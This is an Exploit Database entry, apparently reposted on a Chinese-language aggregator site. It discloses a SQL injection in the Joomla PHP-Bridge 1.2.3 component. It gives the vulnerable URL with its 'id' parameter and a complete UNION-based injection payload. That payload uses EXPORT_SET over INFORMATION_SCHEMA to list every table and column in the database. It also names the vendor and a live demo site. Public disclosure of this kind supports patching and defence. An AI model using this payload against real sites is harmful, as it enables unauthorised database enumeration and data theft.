Joomla! Component PHP-Bridge 1.2.3 – SQL Injection

• Exploit Database
• 15 阅读

• 作者： Ihsan Sencan
  日期： 2017-08-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/42414/

• # # # # #
  # Exploit Title: Joomla! Component PHP-Bridge v1.2.3 - SQL Injection
  # Dork: N/A
  # Date: 02.08.2017
  # Vendor : http://www.henryschorradt.de/
  # Software: https://extensions.joomla.org/extensions/extension/miscellaneous/development/php-bridge/
  # Demo: http://www.henryschorradt.de/joomla-php-bridge/
  # Version: 1.2.3
  # # # # #
  # Author: Ihsan Sencan
  # # # # #
  # SQL Injection/Exploit :
  # http://localhost/[PATH]/index.php?option=com_phpbridge&view=phpview&run=fahrzeuge&mode=detail&id=[SQL]
  # -00000090+union+select+1,(sELECT+eXPORT_sET(5,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(5,eXPORT_sET(5,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--+-
  # Etc..
  # # # # #